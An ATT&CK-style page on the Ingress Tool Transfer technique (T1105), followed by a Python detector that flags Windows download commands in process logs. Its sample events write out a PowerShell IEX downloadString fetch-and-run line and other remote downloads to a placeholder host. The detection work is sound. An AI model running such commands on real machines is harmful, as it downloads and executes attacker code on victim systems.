

On Windows, adversaries may use various utilities to download tools, such as copy, finger, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. (Citation: PTSecurity Cobalt Dec 2016)
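For detection, the Windows download methods named above can be matched in process-creation command lines. The following Python is an added example, not part of the ATT&CK text: the rule names, event fields, and sample events are constructed for illustration, and the WebClient rule also covers the sibling DownloadFile and DownloadData methods.

```python
import re

# One rule per utility named in the paragraph above. Each rule requires
# evidence of a remote source so that purely local use does not match.
RULES = {
    "powershell_downloadstring": re.compile(
        r"net\.webclient\b.*\.download(string|file|data)\s*\(", re.I),
    "powershell_invoke_webrequest": re.compile(
        r"\b(invoke-webrequest|iwr)\b.*\bhttps?://", re.I),
    # copy whose source is a UNC path (\\server\share...)
    "copy_from_unc": re.compile(
        r'\bcopy\s+(/\w\s+)*"?\\\\[^\\\s]+\\\S', re.I),
    # finger queried against a remote host (user@host form)
    "finger_remote": re.compile(r"\bfinger(\.exe)?\s+\S*@\S+", re.I),
}

# Constructed process-creation events (hypothetical hosts and domains).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline":
     r"powershell.exe -c IEX(New-Object Net.WebClient).downloadString('http://files.example.test/a.ps1')"},
    {"host": "WS01", "cmdline":
     r"powershell.exe Invoke-WebRequest -Uri https://files.example.test/t.zip -OutFile C:\Temp\t.zip"},
    {"host": "WS02", "cmdline":
     r"cmd.exe /c copy \\fs01.example.test\share\tool.exe C:\Temp\tool.exe"},
    {"host": "WS03", "cmdline": r"finger.exe user@host.example.test"},
    {"host": "WS04", "cmdline": r"cmd.exe /c copy C:\a.txt C:\b.txt"},      # local copy
    {"host": "WS04", "cmdline": r"powershell.exe Get-ChildItem C:\Temp"},  # no download
]


def match_events(events):
    """Return (host, rule_name) for every event whose command line hits a rule."""
    hits = []
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["cmdline"]):
                hits.append((ev["host"], name))
    return hits


def hosts_by_rule(hits):
    """Group hits by rule; one rule firing on several hosts can indicate spread."""
    grouped = {}
    for host, name in hits:
        grouped.setdefault(name, set()).add(host)
    return grouped


if __name__ == "__main__":
    for host, rule in match_events(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```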

Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols.

T1105 - Ingress Tool Transfer

Description from ATT&CK

Adversaries may transfer tools or other files from an external system into a compromised environment.
